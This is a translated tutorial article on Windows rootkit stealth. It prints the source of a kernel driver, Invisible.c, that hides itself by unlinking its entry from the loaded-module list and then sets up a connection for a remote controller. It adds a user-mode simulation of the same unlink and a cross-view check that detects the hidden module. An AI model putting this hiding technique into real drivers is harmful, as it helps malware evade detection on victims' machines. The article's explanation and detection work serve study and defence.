Introduction to Rootkit Stealth Techniques
Author: 宇文, Source: 51CTO.com, Editor: 韩博颖
2008-03-24 09:28
In the security community rootkits draw more and more attention, and what sets rootkit technology apart is its ability to hide. This article aims to open a door for the reader into rootkit stealth techniques.
The rootkit's header file was covered above; we now turn to the body of the rootkit, which is really nothing more than a basic device driver. The code is shown below as Invisible.c:
```c
// Invisible
#include "ntddk.h"
#include "Invisible.h"      // defines DWORD/PDWORD and DRIVER_DATA (LIST_ENTRY listEntry is its first member)
#include "fileManager.h"
#include "configManager.h"

// Global variables
ULONG majorVersion;
ULONG minorVersion;

// Comment this out for the free build so that it cannot be detected
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
    DbgPrint("comint16: OnUnload called.");
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DRIVER_DATA* driverData;

    // Get the operating system version
    PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

    // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
    // Major = 5: Windows Server 2003, Windows XP or Windows 2000
    // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
    // Minor = 1: Windows XP
    // Minor = 2: Windows Server 2003
    if ( majorVersion == 5 && minorVersion == 2 )
    {
        DbgPrint("comint16: Running on Windows 2003");
    }
    else if ( majorVersion == 5 && minorVersion == 1 )
    {
        DbgPrint("comint16: Running on Windows XP");
    }
    else if ( majorVersion == 5 && minorVersion == 0 )
    {
        DbgPrint("comint16: Running on Windows 2000");
    }
    else if ( majorVersion == 4 && minorVersion == 0 )
    {
        DbgPrint("comint16: Running on Windows NT 4.0");
    }
    else
    {
        DbgPrint("comint16: Running on unknown system");
    }

    // Hide this driver.
    // Offset 20 into DRIVER_OBJECT is the DriverSection field on 32-bit Windows;
    // it points at this driver's entry in the kernel's loaded-module list,
    // which DRIVER_DATA describes (the offset is not valid on 64-bit builds).
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
        // Unlink this driver's entry from the loaded-module list:
        // previous->Flink = next (Flink is the first field of LIST_ENTRY, hence the
        // PDWORD cast), then next->Blink = previous.
        *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
        driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;

        // Point the orphaned entry at itself so that the kernel's own unlink on
        // driver unload does not write through the now-stale neighbour pointers.
        driverData->listEntry.Flink = &driverData->listEntry;
        driverData->listEntry.Blink = &driverData->listEntry;
    }

    // Allow this driver to be unloaded
    pDriverObject->DriverUnload = OnUnload;

    // Set up the connection for this rootkit's controller
    if( !NT_SUCCESS( Configure() ) )
    {
        DbgPrint("comint16: Could not configure remote connection.\n");
        return STATUS_UNSUCCESSFUL;
    }

    return STATUS_SUCCESS;
}
```

Note that the unlink is done without holding the loader's module-list lock, so it can race with a concurrent enumeration of the list. Tools that enumerate drivers by walking that list will no longer see comint16, but the driver's code and its module record remain in memory.
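The list manipulation above is the whole stealth mechanism, so it is worth seeing both halves of it: what the unlink does to a walker of the list, and how a detector catches it anyway. The following user-mode C program is an added example, not code from the original article or from the rootkit it describes. It simulates the kernel's loaded-module list with a stand-in record (MODULE_ENTRY, an assumed reduced layout of LDR_DATA_TABLE_ENTRY with the LIST_ENTRY as its first member, exactly as DRIVER_DATA is laid out in Invisible.h), performs the same two pointer writes that DriverEntry performs, and then applies a cross-view check: every record the allocator handed out is compared against the set reachable by walking the list, and any record missing from the walk is reported as hidden. The module names and base addresses are constructed sample data.

```c
/* Simulation of the DKOM self-hiding trick in Invisible.c and of the
 * cross-view detection that defeats it. Added example; the kernel
 * structures are stand-ins (assumed layouts), not real Windows headers. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Assumed stand-in for LDR_DATA_TABLE_ENTRY: links first, like DRIVER_DATA. */
typedef struct _MODULE_ENTRY {
    LIST_ENTRY    InLoadOrderLinks;
    const char   *BaseDllName;
    unsigned long DllBase;
} MODULE_ENTRY;

#define RECORD_FROM_LINK(link) \
    ((const MODULE_ENTRY *)((const char *)(link) - offsetof(MODULE_ENTRY, InLoadOrderLinks)))

static LIST_ENTRY   g_loadedModuleList;   /* plays the role of PsLoadedModuleList   */
static MODULE_ENTRY g_pool[3];            /* every record ever allocated ("pool")   */
#define POOL_COUNT ((int)(sizeof g_pool / sizeof g_pool[0]))

static void InitializeListHead(LIST_ENTRY *head) { head->Flink = head->Blink = head; }

static void InsertTailList(LIST_ENTRY *head, LIST_ENTRY *entry)
{
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

/* The hide: the same two pointer writes as DriverEntry, then the entry is
 * pointed at itself so a later unlink on unload cannot corrupt the list. */
static void HideModule(MODULE_ENTRY *m)
{
    LIST_ENTRY *entry = &m->InLoadOrderLinks;
    entry->Blink->Flink = entry->Flink;
    entry->Flink->Blink = entry->Blink;
    entry->Flink = entry->Blink = entry;
}

/* View 1: is the record reachable by walking the list, as a naive enumerator does? */
static int OnList(const MODULE_ENTRY *m)
{
    const LIST_ENTRY *cur;
    for (cur = g_loadedModuleList.Flink; cur != &g_loadedModuleList; cur = cur->Flink)
        if (RECORD_FROM_LINK(cur) == m)
            return 1;
    return 0;
}

/* Three "loaded drivers" (constructed names/bases); the rootkit hides itself. */
void BuildScenario(void)
{
    static const char *names[POOL_COUNT] = { "ntoskrnl.exe", "comint16.sys", "tcpip.sys" };
    int i;
    InitializeListHead(&g_loadedModuleList);
    for (i = 0; i < POOL_COUNT; i++) {
        g_pool[i].BaseDllName = names[i];
        g_pool[i].DllBase = 0x80400000UL + 0x100000UL * (unsigned long)i;
        InsertTailList(&g_loadedModuleList, &g_pool[i].InLoadOrderLinks);
    }
    HideModule(&g_pool[1]);   /* what Invisible.c does to its own DriverSection entry */
}

static void EnsureScenario(void)
{
    static int built = 0;
    if (!built) { BuildScenario(); built = 1; }
}

/* Number of modules a list walk reports. */
int VisibleCount(void)
{
    const LIST_ENTRY *cur;
    int n = 0;
    EnsureScenario();
    for (cur = g_loadedModuleList.Flink; cur != &g_loadedModuleList; cur = cur->Flink)
        n++;
    return n;
}

/* Cross-view: records in the pool (view 2) but not on the list (view 1) are hidden. */
int HiddenCount(void)
{
    int i, hidden = 0;
    EnsureScenario();
    for (i = 0; i < POOL_COUNT; i++)
        if (!OnList(&g_pool[i]))
            hidden++;
    return hidden;
}

const char *FirstHiddenName(void)
{
    int i;
    EnsureScenario();
    for (i = 0; i < POOL_COUNT; i++)
        if (!OnList(&g_pool[i]))
            return g_pool[i].BaseDllName;
    return NULL;
}

int main(void)
{
    printf("list walk sees %d of %d modules\n", VisibleCount(), POOL_COUNT);
    printf("%d hidden, first hidden: %s\n", HiddenCount(), FirstHiddenName());
    return 0;
}
```

The list walk reports two modules while the pool still holds three, and the difference names comint16.sys. In a real detector the second view comes from something the rootkit did not edit, such as a scan of kernel pool memory for module-record signatures or a comparison against the driver objects reachable from the object manager namespace; the list edit only fools consumers of the list itself.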